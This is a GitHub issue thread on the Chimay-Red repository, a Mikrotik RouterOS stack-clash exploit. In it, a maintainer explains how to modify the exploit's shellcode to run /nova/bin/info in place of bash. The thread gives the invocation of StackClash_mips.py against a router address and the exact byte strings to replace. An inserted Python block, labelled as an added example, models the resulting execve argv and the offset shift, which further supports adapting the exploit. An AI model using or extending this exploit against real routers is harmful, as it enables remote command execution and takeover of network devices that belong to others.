BigNerd95 / Chimay-Red

Working POC of Mikrotik exploit from Vault 7 CIA Leaks

Got stuck rewriting shellcode #44

Open Zveroloff opened 6 years ago

Zveroloff commented 6 years ago

Could you help with editing the shellcode? I want to send just /nova/bin/info, bypassing the bash shell.

BigNerd95 commented 6 years ago

Why do you want to edit the shellcode? Just write this command:

./StackClash_mips.py 192.168.8.1 80 www_binary '/nova/bin/info "your_mikrotik_command" '

Zveroloff commented 6 years ago

I want to rewrite it because I'm dealing with an already hacked device, and the standard way is not working. Because the device is accessible on port 80 and reports the same (vulnerable) RouterOS version, my idea is to rewrite the shellcode to run just the system utility, not bash. Possibly the attackers did something to bash.

BigNerd95 commented 6 years ago

So edit this line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L126 Replace

shell_code += b'/bin/bash\x00' 

with

shell_code += b'/nova/bin/info\x00' 

Edit line https://github.com/BigNerd95/Chimay-Red/blob/master/StackClash_mips.py#L129 Replace

shell_code += b'-c\x00'

with

shell_code += b'\x20\x00'

Now you can use it:

./StackClash_mips.py 192.168.8.1 80 www_binary "your_mikrotik_command"

I didn't test these mods, but I think they will work.

Zveroloff commented 6 years ago

Thanks, I thought about this, but this way I'll get execve("/nova/bin/info", ["/nova/bin/info", " ", "user_command"]). Is it normal to repeat the executable in the parameter array?

BigNerd95 commented 6 years ago

...yes http://man7.org/linux/man-pages/man2/execve.2.html

argv is an array of argument strings passed to the new program. By convention, the first of these strings (i.e., argv[0]) should contain the filename associated with the file being executed.

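The following is an added example, not code from the Chimay-Red repository or from either commenter. It models the two string edits suggested above (the `/bin/bash` to `/nova/bin/info` and `-c` to `\x20` replacements) together with the execve(2) argv convention quoted here, so the resulting argv can be checked before running the modified StackClash_mips.py against a device. The real shellcode layout is not reproduced; the string-table model, the `ORIGINAL_STRINGS`/`MODIFIED_STRINGS` names and the sample RouterOS command are all assumptions made for this example. One caveat the thread does not mention: `/bin/bash\x00` is 10 bytes and `/nova/bin/info\x00` is 15, so if the shellcode locates its strings by fixed offsets rather than by label, everything after the replaced string moves, and the model reports that shift.

```python
# Added example (not from Chimay-Red): models the NUL-terminated argv string
# table carried by an execve shellcode. Assumption: strings are packed back to
# back, each followed by a NUL, as in the two `shell_code += b'...\x00'` lines.

# Constructed inputs mirroring the thread's before/after edits.
ORIGINAL_STRINGS = [b'/bin/bash', b'-c']
MODIFIED_STRINGS = [b'/nova/bin/info', b'\x20']


def build_string_table(strings):
    """Pack each string followed by a NUL terminator.

    Returns (blob, offsets): offsets[i] is the byte offset of string i
    inside the blob, which is what a shellcode using fixed offsets would
    have to point argv[i] at.
    """
    if any(b'\x00' in s for s in strings):
        raise ValueError('an embedded NUL would truncate that argument')
    blob = b''
    offsets = []
    for s in strings:
        offsets.append(len(blob))
        blob += s + b'\x00'
    return blob, offsets


def parse_string_table(blob):
    """Split a packed table back into its strings, as execve reads them."""
    if not blob.endswith(b'\x00'):
        raise ValueError('string table must end with a NUL')
    return blob[:-1].split(b'\x00')


def argv_seen_by_kernel(table_strings, user_command):
    """Build the argv execve receives.

    argv[0] repeats the program path (the execve(2) convention quoted in the
    thread), argv[1] is the second table string, argv[2] is the user's command
    supplied on the StackClash_mips.py command line.
    """
    blob, _ = build_string_table(table_strings)
    path, flag = parse_string_table(blob)
    return [path, flag, user_command]


def offset_shift(old_strings, new_strings):
    """Net number of bytes by which data after the table moves.

    Non-zero means any hard-coded offset into or past the table must be
    updated; zero means the edit is size-neutral.
    """
    old_blob, _ = build_string_table(old_strings)
    new_blob, _ = build_string_table(new_strings)
    return len(new_blob) - len(old_blob)


if __name__ == '__main__':
    # Sample RouterOS command: an assumption, any /nova/bin/info argument works.
    print(argv_seen_by_kernel(MODIFIED_STRINGS, b'/ip address print'))
    print('offset shift:', offset_shift(ORIGINAL_STRINGS, MODIFIED_STRINGS))
```

Running the model shows argv becomes `[b'/nova/bin/info', b' ', b'/ip address print']`, which matches the argv Zveroloff describes, and a net shift of 4 bytes (15 - 10 for the path, minus 1 for `-c` becoming a single space).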
Zveroloff commented 6 years ago

Oh, thank you!